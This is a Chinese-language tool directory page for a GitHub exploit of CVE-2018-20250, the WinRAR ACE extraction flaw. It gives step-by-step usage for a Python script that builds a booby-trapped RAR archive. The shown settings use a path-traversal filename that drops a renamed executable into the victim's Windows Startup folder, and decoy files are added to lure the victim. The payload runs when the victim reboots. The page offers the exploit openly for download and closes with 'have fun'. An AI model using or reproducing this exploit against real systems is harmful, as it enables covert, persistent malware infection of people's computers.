Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-20250 | Kitploit
工具/GitHubGitHub/likekabin/cve-2018-20250
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHublikekabin/cve-2018-20250

CVE-2018-20250

查看仓库
7年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 从Winrar中提取代码执行 的exp

poc 由 Ridter 编写

如何使用?

你只需要安装 Python 3.7,并准备一个你想运行的恶意文件,设置好你想要的值,这个 exp 脚本会自动生成恶意压缩包文件!

  1. 设置你想要的值
root@kitploit:~
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. 运行 exp,exp 会自动生成 test.rar

  2. 当受害者打开 test.rar 时,他会看到 hello.txt 和 world.txt 文件,你也可以添加更多文件,更具吸引力的文件。

  1. 当他解压该文件时,受害者的用户启动目录中会多出一个名为 hi.exe 的文件,实际上它是 calc.exe。当他重新启动计算机时,hi.exe 将会运行。

玩得开心!:)

下载工具